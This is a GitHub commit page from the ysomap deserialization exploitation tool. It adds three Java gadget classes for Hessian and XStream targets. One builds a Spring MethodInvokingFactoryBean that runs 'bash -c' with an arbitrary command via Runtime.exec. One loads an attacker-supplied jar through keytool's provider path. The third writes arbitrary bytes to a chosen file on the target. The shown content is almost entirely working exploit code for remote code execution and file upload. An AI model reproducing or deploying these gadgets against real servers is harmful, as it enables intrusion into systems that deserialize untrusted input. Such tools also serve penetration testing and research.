-
Notifications
You must be signed in to change notification settings - Fork 150
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
8 changed files
with
219 additions
and
26 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
53 changes: 53 additions & 0 deletions
53
core/src/main/java/ysomap/bullets/spring/SpringExecBullet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
package ysomap.bullets.spring; | ||
|
||
import org.springframework.beans.factory.config.MethodInvokingFactoryBean; | ||
import org.springframework.beans.factory.support.StaticListableBeanFactory; | ||
import ysomap.bullets.AbstractBullet; | ||
import ysomap.common.annotation.*; | ||
import ysomap.core.util.DetailHelper; | ||
import ysomap.core.util.ReflectionHelper; | ||
|
||
import java.lang.reflect.Method; | ||
|
||
/** | ||
* @author wh1t3p1g | ||
* @since 2022/5/16 | ||
*/ | ||
@Bullets | ||
@Authors({Authors.WH1T3P1G}) | ||
@Details("任意函数调用") | ||
@Targets({Targets.HESSIAN, Targets.XSTREAM}) | ||
@Dependencies({"org.springframework:spring-context"}) | ||
public class SpringExecBullet extends AbstractBullet<Object> { | ||
|
||
@NotNull | ||
@Require(name = "command", detail = DetailHelper.COMMAND) | ||
public String command; | ||
|
||
private String beanName = "ysomap"; | ||
|
||
@Override | ||
public Object getObject() throws Exception { | ||
StaticListableBeanFactory beanFactory = new StaticListableBeanFactory(); | ||
beanFactory.addBean(beanName, makeBean()); | ||
return beanFactory; | ||
} | ||
|
||
public Object makeBean() throws Exception { | ||
MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean(); | ||
bean.setSingleton(false); | ||
bean.setTargetObject(Runtime.getRuntime()); | ||
Class cls = Runtime.class; | ||
Method method = cls.getMethod("exec", String[].class); | ||
ReflectionHelper.setFieldValue(bean, "methodObject", method); | ||
ReflectionHelper.setFieldValue(bean, "beanClassLoader", null); | ||
bean.setArguments(new Object[]{new String[]{"bash", "-c", command}}); | ||
return bean; | ||
} | ||
|
||
public static SpringExecBullet newInstance(Object... args) throws Exception { | ||
SpringExecBullet bullet = new SpringExecBullet(); | ||
bullet.set("command", args[0]); | ||
return bullet; | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
54 changes: 54 additions & 0 deletions
54
core/src/main/java/ysomap/bullets/spring/SpringLoadJarBullet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
package ysomap.bullets.spring; | ||
|
||
import org.springframework.beans.factory.config.MethodInvokingFactoryBean; | ||
import ysomap.common.annotation.*; | ||
import ysomap.core.util.ReflectionHelper; | ||
|
||
import java.lang.reflect.Method; | ||
|
||
/** | ||
* @author wh1t3p1g | ||
* @since 2022/5/16 | ||
*/ | ||
@Bullets | ||
@Authors({Authors.WH1T3P1G}) | ||
@Details("任意函数调用") | ||
@Targets({Targets.HESSIAN, Targets.XSTREAM}) | ||
@Dependencies({"org.springframework:spring-context"}) | ||
public class SpringLoadJarBullet extends SpringExecBullet { | ||
|
||
@NotNull | ||
@Require(name = "filepath", detail = "上传至目标环境的jar路径") | ||
public String filepath; | ||
|
||
@NotNull | ||
@Require(name = "evilClass", detail = "需要初始化的对象,默认调用无参构造函数") | ||
public String evilClass; | ||
|
||
private String beanName = "ysomap"; | ||
|
||
public Object makeBean() throws Exception { | ||
MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean(); | ||
bean.setSingleton(false); | ||
bean.setTargetObject(Runtime.getRuntime()); | ||
Class cls = sun.security.tools.keytool.Main.class; | ||
Method method = cls.getMethod("main", String[].class); | ||
ReflectionHelper.setFieldValue(bean, "methodObject", method); | ||
ReflectionHelper.setFieldValue(bean, "beanClassLoader", null); | ||
Object[] evilargs = new Object[]{new String[]{ | ||
"-LIST", "-provider:", | ||
evilClass, | ||
"-keystore", "NONE", "-protected", "-debug", "-providerpath", | ||
filepath | ||
}}; | ||
bean.setArguments(evilargs); | ||
return bean; | ||
} | ||
|
||
public static SpringLoadJarBullet newInstance(Object... args) throws Exception { | ||
SpringLoadJarBullet bullet = new SpringLoadJarBullet(); | ||
bullet.set("filepath", args[0]); | ||
bullet.set("evilClass", args[1]); | ||
return bullet; | ||
} | ||
} |
54 changes: 54 additions & 0 deletions
54
core/src/main/java/ysomap/bullets/spring/SpringUploadBullet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
package ysomap.bullets.spring; | ||
|
||
import com.sun.org.apache.xml.internal.security.utils.JavaUtils; | ||
import org.springframework.beans.factory.config.MethodInvokingFactoryBean; | ||
import ysomap.common.annotation.*; | ||
import ysomap.core.util.FileHelper; | ||
import ysomap.core.util.ReflectionHelper; | ||
|
||
import java.lang.reflect.Method; | ||
|
||
/** | ||
* @author wh1t3p1g | ||
* @since 2022/5/16 | ||
*/ | ||
@Bullets | ||
@Authors({Authors.WH1T3P1G}) | ||
@Details("任意函数调用") | ||
@Targets({Targets.HESSIAN, Targets.XSTREAM}) | ||
@Dependencies({"org.springframework:spring-context"}) | ||
public class SpringUploadBullet extends SpringExecBullet { | ||
|
||
@NotNull | ||
@Require(name = "filepath", detail = "/tmp/test") | ||
public String filepath; | ||
|
||
@NotNull | ||
@Require(name = "localFile", detail = "/tmp/test") | ||
public String localFile; | ||
|
||
private String beanName = "ysomap"; | ||
private byte[] data = null; | ||
|
||
public Object makeBean() throws Exception { | ||
if(data == null){ | ||
data = FileHelper.getFileContent(localFile); | ||
} | ||
MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean(); | ||
bean.setSingleton(false); | ||
Class<?> cls = JavaUtils.class; | ||
bean.setTargetObject(cls); | ||
Method method = cls.getMethod("writeBytesToFilename", String.class, byte[].class); | ||
ReflectionHelper.setFieldValue(bean, "methodObject", method); | ||
ReflectionHelper.setFieldValue(bean, "beanClassLoader", null); | ||
bean.setArguments(filepath, data); | ||
return bean; | ||
} | ||
|
||
public static SpringUploadBullet newInstance(Object... args) throws Exception { | ||
SpringUploadBullet bullet = new SpringUploadBullet(); | ||
bullet.set("filepath", args[0]); | ||
bullet.set("localFile", args[1]); | ||
return bullet; | ||
} | ||
} |
16 changes: 13 additions & 3 deletions
16
core/src/main/java/ysomap/core/serializer/hessian/NoWriteReplaceSerializerFactory.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters